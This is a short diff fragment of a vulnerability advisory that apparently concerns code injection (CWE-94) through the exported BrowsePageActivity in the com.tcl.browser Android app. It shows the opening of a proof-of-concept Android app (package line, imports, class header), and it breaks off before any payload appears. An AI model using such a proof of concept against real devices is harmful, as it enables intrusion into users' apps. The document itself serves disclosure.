actuator/com.tcl.browser/CWE-94.md

 ### Proof of Concept (PoC):

-To demonstrate the vulnerability, one can create a simple Android app that invokes the exported `BrowsePageActivity` activity.
+To demonstrate the vulnerability, one can create a simple Android app that invokes the exported `BrowsePageActivity` activity:

-package com.example.d3m0;

-import android.content.Intent;
-import android.net.Uri;
-import android.os.Bundle;
-import androidx.appcompat.app.AppCompatActivity;

-public class MainActivity extends AppCompatActivity {

     @Override
     protected void onCreate(Bundle savedInstanceState) {